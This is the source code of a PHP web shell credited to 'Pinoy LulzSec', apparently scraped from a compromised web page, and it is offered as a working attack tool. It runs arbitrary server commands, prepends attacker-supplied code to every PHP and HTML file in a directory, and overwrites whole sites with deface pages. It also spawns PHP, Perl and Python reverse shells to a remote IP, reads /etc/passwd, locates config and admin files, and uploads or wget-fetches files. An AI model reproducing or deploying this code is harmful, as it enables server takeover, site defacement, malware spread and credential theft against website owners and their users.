Políticas

# Official shell Pinoy LulzSec # Recoded By - ~G3n3s1s 1:1 # # # ---> ~ Pinoy LulzSec ~ array( "CPU" => "./".$currentfile."?cpu", "Users" => "./".$currentfile."?users", "Memory" => "./".$currentfile."?memory", "Processes" => "./".$currentfile."?processes" ), "Mass Editor" => array( "Infect Files" => "./".$currentfile."?fileInfect", "Deface Files" => "./".$currentfile."?fileDeface" ), "Back Connect" => array( "PHP" => "./".$currentfile."?bcPHP", "Perl" => "./".$currentfile."?bcPerl", "Python" => "./".$currentfile."?bcPython" ), "Shell" => array( "Kill" => "./".$currentfile."?kill", "Credits" => "./".$currentfile."?credits", "Check Links" => "./".$currentfile."?checkLinks" ), "Extras" => array( "Reverse IP" => "./".$currentfile."?reverseIP", "Hash Generator" => "./".$currentfile."?hashGenerator" ), "Search" => array( "Admin Finder" => "./".$currentfile."?adminFinder", "Config Finder" => "./".$currentfile."?configFinder", "Search Files/Dir" => "./".$currentfile."?search" ) ); $links = array( "BOOTSTRAPCSS" => array( "LINK" => "http://dl.dropboxusercontent.com/s/mzs89eukbo0apxz/bootstrap_navbar.css", "MD5" => "5ed756c76e52bcf521040ff09a01f3f3", "DESC" => "Bootstrap Nav Bar CSS" ), "BOOTSTRAPJS" => array( "LINK" => "http://dl.dropboxusercontent.com/s/ogxuaa6ccn0itgd/bootstrap-dropdown.js", "MD5" => "be4478613ae8c0bb1b799e6b340519e4", "DESC" => "Bootstrap Dropdown JS" ), "BACKGROUND" => array( "LINK" => "http://i.imgur.com/b9mP8Rz.png", "MD5" => "bb87b9287906b2cde47fd18680e4f00d", "DESC" => "Background Image" ) ); if(!@$_GET['dir']) { $dir = CleanDir(getcwd()); } else { $dir = CleanDir($_GET['dir']); } function CleanDir($directory) { $directory = str_replace("\\", "/", $directory); $directory = str_replace("//", "/", $directory); return $directory; } function ByteConversion($bytes, $precision = 2) { $kilobyte = 1024; $megabyte = $kilobyte * 1024; $gigabyte = $megabyte * 1024; $terabyte = $gigabyte * 1024; if (($bytes >= 0) && ($bytes < $kilobyte)) { return $bytes . ' B'; } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) { return round($bytes / $kilobyte, $precision) . ' KB'; } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) { return round($bytes / $megabyte, $precision) . ' MB'; } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) { return round($bytes / $gigabyte, $precision) . ' GB'; } elseif ($bytes >= $terabyte) { return round($bytes / $terabyte, $precision) . ' TB'; } else { return $bytes . ' B'; } } function success($message) { echo "
$message
"; } function error($message) { echo "
$message
"; } function redirect($url) { echo ""; } function mass_files($mass_dir, $justdirs) { if($dh = opendir($mass_dir)) { $files = array(); $inner_files = array(); while($file = readdir($dh)) { if($file != "." && $file != ".." && $file[0] != '.') { if(is_dir($mass_dir . "/" . $file)) { $inner_files = mass_files("$mass_dir/$file", $justdirs); if(is_array($inner_files)) $files = array_merge($files, $inner_files); if($justdirs) { array_push($files, "$mass_dir/$file"); } } else { if(!$justdirs) { array_push($files, "$mass_dir/$file"); } } } } closedir($dh); return $files; } } function can_exe() { global $disabledfunc; global $syscoms; $disabledfunc = explode(",", str_replace(' ', '', $disabledfunc)); if(count(array_intersect($syscoms, $disabledfunc)) == count($syscoms)) { return false; } else { return true; } } function exe_cmd($command) { global $dir; chdir($dir); if(function_exists('proc_open')) { $execute = proc_open($command, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); $result = ""; while (!feof($io[1])) { $result .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } while (!feof($io[2])) { $result .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($execute); return $result; } elseif(function_exists('system')) { $result = system($command); return $result; } elseif(function_exists('exec')) { $result = exec($command); return $result; } elseif(functions_exists('shell_exec')) { $result = shell_exec($command); return $result; } elseif(function_exists('passthru')) { $result = passthru($command); return $result; } } function salt_gen($length) { $characters = array("a","A","b","B","c","C","d","D","e","E","f","F","g","G","h","H","i","I","j","J","k","K","l","L","m","M","n","N","o","O","p","P","q","Q","r","R","s","S","t","T","u","U","v","V","w","W","x","X","y","Y","z","Z","1","2","3","4","5","6","7","8","9"); $i = 0; $salt = ""; while($i < $length) { $arrand = array_rand($characters, 1); $salt .= $characters[$arrand]; $i++; } return $salt; } function extract_file($filepath, $extractpath, $type) { if($type == 'zip') { if(class_exists('ZipArchive')) { $newzip = new ZipArchive; $open = $newzip->open($filepath); if($open == true) { $newzip->extractTo($extractpath); $newzip->close(); redirect("?dir=$extractpath"); } else { error('Failed to open zip archive!'); } } else { if(can_exe()) { error('ZipArchive class does not exist!
Trying to extract via sys commands'); echo "
The response from 'unzip $filepath -d $extractpath' was:
"; } else { error('Zip archive does not exist and commands can not be executed!'); } } } elseif($type == 'tar') { if(class_exists('PharData')) { $newphar = new PharData($filepath); $newphar->extractTo($extractpath); unlink($filepath); redirect("?dir=$extractpath"); } else { if(can_exe()) { error('PharData class does not exist!
Trying to extract via sys commands'); echo "
The response from 'tar xvf $filepath -C $extractpath' was:
"; } else { error('PharData class does not exist and commands can not be executed!'); } } } elseif($type == 'gz') { if(function_exists('gzopen')) { $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME)); $open = gzopen($filepath, "rb"); while($contents = gzread($open, 4096)) { file_put_contents($decomname, $contents, FILE_APPEND); } gzclose($open); redirect("?dir=$extractpath"); } else { if(can_exe()) { $decomname = $extractpath."/".str_replace(".gz", "", pathinfo($filepath, PATHINFO_BASENAME)); error('Zlib does not seem to be enabled!
Trying to extract via sys commands.'); echo "
The response from 'gunzip -c $filepath > $decomname' was:
"; } else { error('Zlib does not seem to be enabled and commands can not be executed!'); } } } elseif($type == 'tgz') { if(class_exists('PharData')) { $newphar = new PharData($filepath); $newphar->decompress(); $newphar = new PharData(str_replace(".tgz", ".tar", $filepath)); $newphar->extractTo($extractpath); unlink($filepath); unlink(str_replace(".tgz", ".tar", $filepath)); redirect("?dir=$extractpath"); } else { if(can_exe()) { error('PharData class does not exist!
Trying to extract via sys commands.'); echo "
The response from 'tar xvfz $filepath -C $extractpath && rm $filepath' was:
"; } else { error('PharData class does not exist and commands can not be executed!'); } } } elseif($type == 'rar') { if(class_exists('RarArchive')) { $openrar = RarArchive::open($filepath); if($raropen == true) { $entries = $openrar->getEntries(); foreach($entries as $files) { $files->extract($extractpath); } $openrar->close(); } else { error('Failed to open rar file!'); $openrar->close(); } } else { if(can_exe()) { error('RarArchive class does not exist!
Trying to extract via sys commands.'); echo "
The response from 'unrar x $filepath $extractpath' was:
"; } else { error('RarArchive class does not exist and commands can not be executed!'); } } } } //Initialize StyleSheet echo " "; //Let's display nav bar echo << $(window).load(function(){ $('#topbar').dropdown(); });
Home
html; //#OpHongKong Banner echo "
Pinoy Lulz Security


"; //Let's display system bar if(empty($disabledfunc)) { $disabledfun = "None"; } else { $count = count(explode(",", $disabledfunc)); $disabledfun = "$count functions disabled"; } echo << Your IP User System Server Software Gateway Interface PHP Version Server Name Server IP safe_mode open_basedir Disabled Functions $yourip $whoami $uname $serversoftware $gatewayinterface $phpversion $servername $serverip $safemode $openbasedir $disabledfun

html; //Read & Edit File if(isset($_POST['save_file'])) { $file = $_GET['edit']; $newcontent = $_POST['edit_file']; if(get_magic_quotes_gpc()) { $newcontent = stripslashes($newcontent); } if(file_put_contents($file, $newcontent)) { success("File has been saved successfully!"); } else { error("File was not saved successfully!"); } } if(isset($_POST['delete_file'])) { $file = $_GET['edit']; if(unlink($file)) { success("File was successfully deleted!"); } else { error("File could not be deleted successfully!"); } } if(isset($_GET['delF'])) { $file = $_GET['delF']; if(unlink($file)) { success("File was successfully deleted!"); } else { error("File could not be deleted successfully!"); } } if(isset($_GET['delD'])) { $ddir = $_GET['delD']; if(can_exe()) { echo "
The response from 'rm -rf $ddir' was:
"; } else { if(rmdir($ddir)) { success("Directory successfully deleted!"); } else { error("Failed to delete directory!"); } } } if(isset($_GET['edit'])) { $file = $_GET['edit']; if(file_exists($file)) { $content = htmlspecialchars(file_get_contents($file)); if(!is_writeable($file)) { echo "
This file is read only!
"; } else { echo "

"; } } else { error("File does not exist!"); } } //Rename File if(isset($_POST['rename'])) { $newname = $_POST['new_name']; $oldname = $_GET['rename']; $rdir = $_GET['rdir']; if(rename("$rdir/$oldname", "$rdir/$newname")) { success("File was successfully renamed to: $newname"); } else { error("File was not renamed!"); } } if(isset($_GET['rename'])) { $oldname = $_GET['rename']; echo "
Rename:
"; } //Search Files and Directories if(isset($_GET['search'])) { echo "
Search for value in file and directory names.
Directory to search in:
Value to search for:
"; } if(isset($_POST['search'])) { $searchdir = $_POST['search_dir']; $searchval = $_POST['search_val']; echo "Search results that contain '$searchval' in file names.
"; foreach(mass_files($searchdir, false) as $key => $filename) { $basename = pathinfo($filename, PATHINFO_BASENAME); if(preg_match('/'.$searchval.'/', $basename)) { echo "$filename
"; } } echo "
Search results that contain '$searchval' in directory names.
"; foreach(mass_files($searchdir, true) as $key => $dirname) { $basename = pathinfo($dirname, PATHINFO_BASENAME); if(preg_match('/'.$searchval.'/', $basename)) { echo "$dirname
"; } } } //Config Finder if(isset($_GET['configFinder'])) { echo "Search results that contain 'config' in file names.
"; foreach(mass_files($rootdir, false) as $key => $filename) { $basename = pathinfo($filename, PATHINFO_BASENAME); if(preg_match('/config/', $basename)) { echo "$filename
"; } } echo "
Search results that contain 'config' in directory names.
"; foreach(mass_files($rootdir, true) as $key => $filename) { $basename = pathinfo($filename, PATHINFO_BASENAME); if(preg_match('/config/', $basename)) { echo "$filename
"; } } } //Admin Finder if(isset($_GET['adminFinder'])) { echo "Search results that contain 'admin' in directory names.
"; foreach(mass_files($rootdir, true) as $key => $filename) { $basename = pathinfo($filename, PATHINFO_BASENAME); if(preg_match('/admin/', $basename)) { echo "$filename
"; } } echo "
Search results that contain 'admin' in file names.
"; foreach(mass_files($rootdir, false) as $key => $filename) { $basename = pathinfo($filename, PATHINFO_BASENAME); if(preg_match('/admin/', $basename)) { echo "$filename
"; } } } //Reverse IP if(isset($_GET['reverseIP'])) { echo "
Domain Name or IP Address:
"; } //Hash Generator if(isset($_GET['hashGenerator'])) { echo "
String to hash:
"; } if(isset($_POST['generate_hashes'])) { $string = $_POST['string']; $md5 = md5($string); $md52 = md5(md5($string)); $md53 = md5(md5(md5($string))); $sha1 = sha1($string); $sha12 = sha1(sha1($string)); $sha13 = sha1(sha1(sha1($string))); $joomlasalt = salt_gen("4"); $joomlahash = md5($string.$joomlasalt); $oscommsalt = salt_gen("2"); $oscommhash = md5($oscommsalt.$string); $vbsalt = salt_gen("3"); $vbhash = md5(md5($string).$vbsalt); $vbsalt2 = salt_gen("30"); $vbhash2 = md5(md5($string).$vbsalt2); $mybbsalt = salt_gen("8"); $mybbhash = md5(md5($mybbsalt).md5($string)); $mybbsalt2 = salt_gen("8"); $mybbhash2 = md5(md5($mybbsalt2).$string); $ipbsalt = salt_gen("5"); $ipbhash = md5(md5($ipbsalt).md5($string)); echo "
"; } //Extract Files if(isset($_GET['extract'])) { $file = $_GET['extract']; $epath = $_GET['epath']; $type = $_GET['type']; extract_file($file, $epath, $type); } //Infect Files if(isset($_POST['do_infect'])) { $infdir = rtrim($_POST['infect_dir'], '/'); $type = $_POST['infect_type']; $infcode = $_POST['infect_code']; if(is_dir($infdir)) { $success = 0; $failed = 0; foreach(mass_files($infdir, false) as $key => $files) { $exten = pathinfo($files, PATHINFO_EXTENSION); if($type == 'php') { if($exten == 'php') { $content = $infcode; $content .= file_get_contents($files); if(file_put_contents($files, $content)) { echo "Successfully infected file: $files
"; $success++; } else { echo "Failed to infect file: $files
"; $failed++; } } } elseif($type == 'html') { if($exten == 'html') { $content = $infcode; $content .= file_get_contents($files); if(file_put_contents($files, $content)) { echo "Successfully infected file: $files
"; $success++; } else { echo "Failed to infect file: $files
"; $failed++; } } } elseif($type == 'both') { if($exten == 'html' or $exten == 'php') { $content = $infcode; $content .= file_get_contents($files); if(file_put_contents($files, $content)) { echo "Successfully infected file: $files
"; $success++; } else { echo "Failed to infect file: $files
"; $failed++; } } } } echo "A total of $success files were infected!
A total of $failed files failed to be infected!"; } else { error("$infdir is not a valid directory!"); } } if(isset($_GET['fileInfect'])) { echo "
This will append your infect code to the top of every file in the given directory.
Directory to infect: File types to infect:
Code to infect files with:

"; } //Deface Files if(isset($_POST['do_deface'])) { $defdir = rtrim($_POST['deface_dir'], '/'); $type = $_POST['deface_type']; $defsource = $_POST['deface_source']; if(is_dir($defdir)) { $success = 0; $failed = 0; foreach(mass_files($defdir, false) as $key => $files) { $exten = pathinfo($files, PATHINFO_EXTENSION); if($type == 'php') { if($exten == 'php') { if($files != __FILE__) { if(file_put_contents($files, $defsource)) { echo "Successfully defaced file: $files
"; $success++; } else { echo "Failed to deface file: $files
"; $failed++; } } } } elseif($type == 'html') { if($exten == 'html') { if($files != __FILE__) { if(file_put_contents($files, $defsource)) { echo "Successfully defaced file: $files
"; $success++; } else { echo "Failed to deface file: $files
"; $failed++; } } } } elseif($type == 'both') { if($exten == 'html' or $exten == 'php') { if($files != __FILE__) { if(file_put_contents($files, $defsource)) { echo "Successfully defaced file: $files
"; $success++; } else { echo "Failed to deface file: $files
"; $failed++; } } } } } echo "A total of $success files were defaced!
A total of $failed files failed to be defaced!"; } else { error("$defdir is not a valid directory!"); } } if(isset($_GET['fileDeface'])) { echo "
This will deface every file in the given directory. This will not deface this shell.
Directory to deface: File types to deface:
Source to deface files with:

"; } //Back Connect if(isset($_POST['bcpl_connect'])) { $ip = $_POST['bcpl_ip']; $port = $_POST['bcpl_port']; if(can_exe()) { if(file_exists("/tmp/bc.pl")) { echo "
Trying to connect to $ip on port $port
The response from 'perl /tmp/bc.pl $ip $port' was:
"; } else { error("/tmp/bc.pl does not exist!"); } } else { error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!"); } } if(isset($_GET['bcPerl'])) { if(can_exe()) { if(is_dir('/tmp')) { if(file_put_contents('/tmp/bc.pl', base64_decode($bcpl))) { success("Successfully wrote /tmp/bc.pl!"); echo "
IP: Port:
Use: 'nc -l -v -p PORT' Remember your port must be forwarded!
"; } else { error("Failed to write Perl source to /tmp/bc.pl!"); } } else { error('/tmp is not a directory!'); } } else { error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!"); } } if(isset($_POST['bcpy_connect'])) { $ip = $_POST['bcpy_ip']; $port = $_POST['bcpy_port']; if(can_exe()) { if(file_exists("/tmp/bc.py")) { echo "
Trying to connect to $ip on port $port
The response from 'python /tmp/bc.py $ip $port' was:
"; } else { error("/tmp/bc.py does not exist!"); } } else { error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!"); } } if(isset($_GET['bcPython'])) { if(can_exe()) { if(is_dir("/tmp")) { if(file_put_contents('/tmp/bc.py', base64_decode($bcpy))) { success("Successfully wrote /tmp/by.py"); echo "
IP: Port:
Use 'nc -l -v -p PORT' Remember your port must be forwarded!
"; } else { error("Failed to write Python source to /tmp/by.py"); } } else { error("/tmp is not a directory!"); } } else { error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!"); } } if(isset($_POST['bcphp_connect'])) { $ip = $_POST['bcphp_ip']; $port = $_POST['bcphp_port']; echo "
Trying to connect!
"; $sockopen = fsockopen($ip , $port , $errno, $errstr); if(!$sockopen) { error("Failed to open socket!"); } elseif($errno != 0) { error("$errno: $errstr"); } else { fputs($sockopen, "\n[+]PHP Back Connection[+]\n\n"); $uname = exe_cmd("uname -a"); $id = exe_cmd("id"); fputs($sockopen, "$uname$id\n"); while(!feof($sockopen)) { fputs($sockopen, "> "); $command = fgets($sockopen); fputs($sockopen , exe_cmd($command)); } fclose($sockopen); } } if(isset($_GET['bcPHP'])) { if(can_exe()) { echo "
IP: Port:
Use 'nc -l -v -p PORT' Remember your port must be forwarded!
"; } else { error("Can not execute commands! Commands need to be executed for this reverse shell to work!"); } } //System if(isset($_GET['users'])) { if(file_exists('/etc/passwd')) { $getfile = file_get_contents('/etc/passwd'); $exline = explode("\n", $getfile); echo ""; foreach($exline as $exl) { echo ""; $excol = explode(":", $exl); foreach($excol as $exc) { echo ""; } echo ""; } echo "
Username Password? UID GID UID Info Home Directory Command/Shell
$exc
"; } else { error("/etc/passwd does not exist!"); } } if(isset($_GET['processes'])) { if(can_exe()) { $processes = exe_cmd("ps aux"); $stripfirstline = substr($processes, strpos($processes, "\n")+1); $exline = explode("\n", $stripfirstline); echo "
"; foreach($exline as $exl) { echo ""; $exsp = array_values(array_filter(explode(" ", $exl), 'strlen')); if(count($exsp) > 11) { $slice = array_slice($exsp, 0, 10); echo ""; foreach($slice as $s) { echo ""; } $slice2 = array_slice($exsp, 10); echo ""; } else { echo ""; foreach($exsp as $e) { echo ""; } } echo ""; } echo "
Kill USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
Kill$s".implode(" ", $slice2)."Kill$e
"; } else { error("Can not execute commands! Must execute 'ps aux' to get processes."); } } if(isset($_GET['memory'])) { if(file_exists('/proc/meminfo')) { $raminfo = file_get_contents('/proc/meminfo'); echo "Ram:
$raminfo


"; } else { error("/proc/meminfo does not exist!"); } $hddfree = disk_free_space("/"); $hddtotal = disk_total_space("/"); $hddused = $hddtotal - $hddfree; $hddpercent = round(($hddused / $hddtotal) * 100); echo "HDD:
Total Space: ".ByteConversion($hddtotal)."
Free Space: ".ByteConversion($hddfree)."
Used Space: ".ByteConversion($hddused)."
Percent Used: ~$hddpercent%"; } if(isset($_GET['cpu'])) { if(file_exists('/proc/cpuinfo')) { $cpuinfo = file_get_contents('/proc/cpuinfo'); echo "
CPU Information:
"; } else { error('/proc/cpuinfo does not exist!'); } } //Execute Command if(isset($_POST['exe_cmd'])) { $command = $_POST['command']; if(can_exe()) { echo "
The response from '$command' was:
"; } else { error("Can not execute commands!"); } } //Create File if(isset($_POST['create_file'])) { $createpath = $_POST['create_file_path']; if(!file_exists($createpath)) { if(fopen($createpath, "w+")) { redirect("?edit=$createpath"); } else { error("Failed to create file!"); } } else { error("File already exists! You can view it here."); } } //Create Directory if(isset($_POST['create_dir'])) { $dirpath = $_POST['create_dir_path']; if(!is_dir($dirpath)) { if(mkdir($dirpath, 0777)) { redirect("?dir=$dirpath"); } else { error("Failed to make directory!"); } } else { error("This directory already exists! You can view it here."); } } //Wget File if(isset($_POST['do_wget'])) { $fileurl = $_POST['wget_file']; if(can_exe()) { echo "
The response from 'wget $fileurl' was:
"; } else { error("Commands can not be executed!"); } } //Upload File if(isset($_POST['do_upload'])) { $uploaddir = $_POST['upload_dir']; $uploadname = $_FILES['upload_file']['name']; if(!file_exists("$uploaddir/$uploadname")) { if(move_uploaded_file($_FILES['upload_file']['tmp_name'], "$uploaddir/$uploadname")) { redirect("?dir=$uploaddir"); } else { error("Failed to upload file!"); } } else { error("File already exists! You can view it here."); } } //Mass Files if(isset($_POST['mass_action'])) { $action = $_POST['action']; $checked = $_POST['massbox']; if($action == 'delete') { foreach($checked as $c) { if(is_dir($c)) { if(rmdir($c)) { echo "Successfully deleted directory: $c
"; } else { echo "Failed to delete directory: $c
"; } } else { if(unlink($c)) { echo "Successfully deleted file: $c
"; } else { echo "Failed to delete file: $c
"; } } } } elseif($action == 'chmod') { $chvalue = $_POST['chmod_value']; foreach($checked as $c) { if(chmod($c, $chvalue)) { echo "Successfully chmod'd file: $c to: $chvalue
"; } else { echo "Failed to chmod file: $c to: $chvalue
"; } } } else { error('Invalid action specified!'); } } //Display Disabled Functions if(isset($_GET['disabledFunctions'])) { echo "Disabled functions:
"; $ex = explode(",", $disabledfunc); foreach($ex as $e) { echo "$e
"; } } //Kill Process if(isset($_GET['killProcess'])) { $id = $_GET['killProcess']; if(posix_kill($id)) { success("Successfully killed process: $id"); } else { error("Failed to kill process: $id"); } } //Check Links if(isset($_GET['checkLinks'])) { echo ""; foreach($links as $key => $ar) { $link = $ar['LINK']; $md5 = $ar['MD5']; $desc = $ar['DESC']; $headers = @get_headers($link); echo ""; echo ""; if($headers[0] != "HTTP/1.1 403 FORBIDDEN" or $headers[0] != "HTTP/1.1 404 Not Found") { echo ""; } else { echo ""; } if(md5_file($link) == $md5) { echo ""; } else { echo ""; } echo ""; echo ""; } echo "
Link Status MD5 Description
$linkOKNot FoundMatchNo Match$desc
"; } //Credits if(isset($_GET['credits'])) { echo "
$version Shell
Developed By: T3CH (@t3chfl4r3 or t3chfl4r3@gmail)
Nav Bar: Bootstrap (http://getbootstrap.com/)
Perl Reverse Shell: pentestmonkey@pentestmonkey.net
Python Reverse Shell: Xavier Garcia (http://www.shellguardians.com)
"; } //Kill if(isset($_GET['kill'])) { if(unlink(__FILE__)) { success("Successfully killed shell!"); } else { error("Failed to kill shell!"); } } //Get Files & Directories from Current Directory $open = opendir($dir); $files = array(); $direcs = array(); while ($file = readdir($open)) { if ($file != "." && $file != "..") { if (is_dir("$dir/$file")) { array_push($direcs, $file); } else { array_push($files, $file); } } } asort($direcs); asort($files); //Display Files and Directories echo <<
Current Directory: html; $ex = explode("/", $dir); for ($p = 0; $p < count($ex); $p++) { @$linkpath.=$ex[$p] . '/'; $linkpath2 = rtrim($linkpath, "/"); echo "$ex[$p]/"; } echo <<
html; //Display Directories foreach($direcs as $dirs) { $perms = substr(base_convert(fileperms("$dir/$dirs"), 10, 8), 2); $writeable = is_writeable("$dir/$dirs") ? "Writeable" : "Not Writeable"; $owner = fileowner("$dir/$dirs"); $group = filegroup("$dir/$dirs"); $size = "Directory"; $lastmod = date("F d Y g:i:s", filemtime("$dir/$dirs")); echo << html; } //Display Files foreach($files as $file) { $perms = substr(base_convert(fileperms("$dir/$file"), 10, 8), 2); $writeable = is_writeable("$dir/$file") ? "Writeable" : "Not Writeable"; $owner = fileowner("$dir/$file"); $group = filegroup("$dir/$file"); $size = ByteConversion(filesize("$dir/$file")); $lastmod = date("F d Y g:i:s", filemtime("$dir/$file")); $extension = pathinfo("$dir/$file", PATHINFO_EXTENSION); echo ""; if(in_array($extension, $compression)) { echo ""; } else { echo ""; } echo <<$perms html; } echo <<



html; if(is_writeable($dir)) { $writeable = "[ Writeable ]"; } else { $writeable = "[ Not Writeable ]"; } echo "
File/Dir Name Permissions Writeable Owner/Group Size Last Modified Delete Rename Mass
$dirs $perms $writeable $owner/$group $size $lastmod Delete Rename
$file$file $writeable $owner/$group $size $lastmod Delete Rename
Create File:

$writeable
Create Directory:

$writeable
Edit File:
Go To Directory:
Upload To Directory:


$writeable
wget file:
Execute Command:


"; ?>